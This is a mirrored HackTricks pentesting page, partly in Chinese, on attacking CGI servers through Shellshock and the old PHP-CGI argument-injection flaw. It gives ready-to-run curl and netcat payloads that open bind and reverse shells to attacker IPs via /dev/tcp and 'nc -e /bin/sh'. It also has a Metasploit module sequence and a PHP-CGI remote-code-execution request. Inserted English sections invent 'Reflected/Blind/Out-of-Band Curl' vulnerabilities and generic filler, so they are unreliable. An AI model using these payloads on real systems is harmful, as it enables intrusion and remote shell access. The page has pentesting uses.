Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-23 13:13:41 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/network-services-pentesting/pentesting-web/cgi.md
Translator workflow a21a0e7217 Translated to Chinese
2023-08-03 19:12:22 +00:00

14 KiB
Raw Blame History

☁️ HackTricks云 ☁️ -🐦 推特 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

信息

CGI脚本是perl脚本所以如果你已经入侵了一个可以执行_.cgi_脚本的服务器你可以上传一个perl反向shell/usr/share/webshells/perl/perl-reverse-shell.pl将扩展名从**.pl改为.cgi**,给予执行权限chmod +x)并且通过web浏览器访问反向shell来执行它。 为了测试CGI漏洞,建议使用nikto -C all(以及所有插件)

ShellShock

Bash也可以用于运行应用程序传递给它的命令正是这个功能受到了漏洞的影响。可以发送给Bash的一种命令类型允许设置环境变量。环境变量是动态的、命名的值影响计算机上运行的进程的方式。漏洞在于攻击者可以将恶意代码附加到环境变量中,在接收到变量后运行该代码

利用这个漏洞,页面可能会抛出错误

你可以通过注意到它使用了旧版本的Apachecgi_mod带有cgi文件夹或使用nikto发现这个漏洞。

测试

大多数测试都是基于输出一些内容并期望该字符串在web响应中返回。如果你认为一个页面可能存在漏洞请搜索所有的cgi页面并对它们进行测试。

Nmap

nmap 10.2.1.31 -p 80 --script=http-shellshock --script-args uri=/cgi-bin/admin.cgi

Curl反射型、盲注和带外

Reflected Curl

Description

Reflected Curl is a technique used to exploit web applications that reflect user-supplied input in the response. This vulnerability occurs when the application takes user input and includes it in the response without proper sanitization or validation. An attacker can craft a malicious request that includes Curl commands as input, which are then executed by the server and the output is reflected back in the response.

Exploitation

To exploit this vulnerability, an attacker can send a specially crafted request to the target web application, including Curl commands as input. The server will execute these commands and include the output in the response. The attacker can then analyze the response to gather sensitive information or perform further attacks.

Mitigation

To mitigate the risk of reflected Curl attacks, it is important to properly sanitize and validate user input before including it in the response. This can be done by implementing input validation and output encoding techniques, such as using secure coding practices and frameworks that automatically handle input sanitization.

Blind Curl

Description

Blind Curl is a technique used to exploit web applications that do not directly reflect user-supplied input in the response, but still execute Curl commands based on that input. This vulnerability occurs when the application takes user input and uses it to construct Curl commands that are executed by the server without directly reflecting the output in the response.

Exploitation

To exploit this vulnerability, an attacker needs to find a way to infer the output of the executed Curl commands indirectly. This can be done by observing the behavior of the application, such as the response time or the presence of certain error messages. By carefully crafting input, the attacker can manipulate the behavior of the application and gather information about the executed Curl commands.

Mitigation

To mitigate the risk of blind Curl attacks, it is important to carefully review and validate the construction of Curl commands based on user input. Additionally, implementing proper error handling and logging mechanisms can help detect and prevent blind Curl vulnerabilities.

Out-of-Band Curl

Description

Out-of-Band Curl is a technique used to exploit web applications by leveraging external communication channels to retrieve the output of executed Curl commands. This vulnerability occurs when the application executes Curl commands that trigger external requests to a controlled server, allowing the attacker to capture the output through this communication channel.

Exploitation

To exploit this vulnerability, an attacker needs to set up a controlled server that can receive the external requests triggered by the executed Curl commands. By crafting malicious input that includes Curl commands, the attacker can make the application send requests to the controlled server, which captures the output and allows the attacker to gather sensitive information.

Mitigation

To mitigate the risk of out-of-band Curl attacks, it is important to carefully review and validate the execution of Curl commands within the application. Additionally, implementing proper input validation and output encoding techniques can help prevent the inclusion of malicious Curl commands in user input.

# Reflected
curl -H 'User-Agent: () { :; }; echo "VULNERABLE TO SHELLSHOCK"' http://10.1.2.32/cgi-bin/admin.cgi 2>/dev/null| grep 'VULNERABLE'
# Blind with sleep (you could also make a ping or web request to yourself and monitor that oth tcpdump)
curl -H 'User-Agent: () { :; }; /bin/bash -c "sleep 5"' http://10.11.2.12/cgi-bin/admin.cgi
# Out-Of-Band Use Cookie as alternative to User-Agent
curl -H 'Cookie: () { :;}; /bin/bash -i >& /dev/tcp/10.10.10.10/4242 0>&1' http://10.10.10.10/cgi-bin/user.sh

Shellsocker

python shellshocker.py http://10.11.1.71/cgi-bin/admin.cgi

攻击利用

Exploiting vulnerabilities in CGI scripts is a common technique used in web application penetration testing. CGI (Common Gateway Interface) is a protocol that allows web servers to execute scripts and generate dynamic content. By exploiting vulnerabilities in CGI scripts, an attacker can gain unauthorized access to the server or execute arbitrary code.

Remote Command Execution

Remote Command Execution (RCE) is a type of vulnerability that allows an attacker to execute arbitrary commands on the target server. In the context of CGI scripts, RCE vulnerabilities can be exploited by injecting malicious commands into user input fields or by manipulating the parameters passed to the script.

To exploit an RCE vulnerability in a CGI script, an attacker needs to identify the input fields or parameters that are vulnerable to command injection. Once identified, the attacker can craft a payload that includes the malicious command and submit it to the server. If the vulnerability is successfully exploited, the server will execute the injected command and return the output to the attacker.

File Inclusion

File Inclusion vulnerabilities occur when a CGI script includes external files without proper validation. This can allow an attacker to include arbitrary files from the server's file system, potentially exposing sensitive information or executing malicious code.

To exploit a File Inclusion vulnerability in a CGI script, an attacker needs to identify the vulnerable inclusion point and provide a path to the file they want to include. This can be done by manipulating the parameters passed to the script or by exploiting other vulnerabilities to gain control over the file inclusion process.

Once the File Inclusion vulnerability is successfully exploited, the attacker can read sensitive files, such as configuration files or user credentials, or execute arbitrary code by including a malicious file.

Directory Traversal

Directory Traversal vulnerabilities occur when a CGI script does not properly sanitize user input, allowing an attacker to navigate outside of the intended directory structure and access files or directories that should be restricted.

To exploit a Directory Traversal vulnerability in a CGI script, an attacker needs to identify the input fields or parameters that are vulnerable to directory traversal attacks. By manipulating these inputs, the attacker can navigate to directories outside of the intended scope and access sensitive files or directories.

Once the Directory Traversal vulnerability is successfully exploited, the attacker can read or modify files, upload malicious files, or gain unauthorized access to restricted areas of the server.

Code Injection

Code Injection vulnerabilities occur when a CGI script does not properly validate or sanitize user input, allowing an attacker to inject and execute arbitrary code on the server.

To exploit a Code Injection vulnerability in a CGI script, an attacker needs to identify the input fields or parameters that are vulnerable to code injection. By injecting malicious code into these inputs, the attacker can trick the server into executing the injected code.

Once the Code Injection vulnerability is successfully exploited, the attacker can execute arbitrary commands, gain unauthorized access to the server, or perform other malicious activities.

Conclusion

Exploiting vulnerabilities in CGI scripts can provide attackers with unauthorized access to servers or the ability to execute arbitrary code. It is important for web application developers and administrators to properly validate and sanitize user input to prevent these types of vulnerabilities. Regular security assessments and penetration testing can help identify and mitigate these risks.

#Bind Shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc -l -p 9999 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 8
#Reverse shell
$ echo -e "HEAD /cgi-bin/status HTTP/1.1\r\nUser-Agent: () { :;}; /usr/bin/nc 192.168.159.1 443 -e /bin/sh\r\nHost: vulnerable\r\nConnection: close\r\n\r\n" | nc vulnerable 80
#Reverse shell using curl
curl -H 'User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/10.11.0.41/80 0>&1' http://10.1.2.11/cgi-bin/admin.cgi
#Reverse shell using metasploit
> use multi/http/apache_mod_cgi_bash_env_exec
> set targeturi /cgi-bin/admin.cgi
> set rhosts 10.1.2.11
> run

代理中间人攻击到Web服务器请求

CGI为每个HTTP请求的头部创建一个环境变量。例如"host:web.com"被创建为"HTTP_HOST"="web.com"

由于Web服务器可能使用HTTP_PROXY变量尝试发送一个包含 "Proxy: <IP_attacker>:<PORT>"的头部。如果服务器在会话期间执行任何请求,您将能够捕获服务器发出的每个请求。

旧版PHP + CGI = RCECVE-2012-1823CVE-2012-2311

基本上如果cgi处于活动状态且php是“旧的”<5.3.12 / < 5.4.2),则可以执行代码。 为了利用此漏洞您需要访问Web服务器的某个PHP文件而无需发送参数特别是不发送字符“=”)。 然后,为了测试此漏洞,您可以访问例如/index.php?-s(注意-s),并且应用程序的源代码将出现在响应中

然后,为了获得RCE,您可以发送此特殊查询:/?-d allow_url_include=1 -d auto_prepend_file=php://input,并将要在请求的正文中执行的PHP代码。示例:

curl -i --data-binary "<?php system(\"cat /flag.txt \") ?>" "http://jh2i.com:50008/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input"

有关漏洞和可能的利用的更多信息:https://www.zero-day.cz/database/337/cve-2012-1823cve-2012-2311CTF Writeup Example.

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥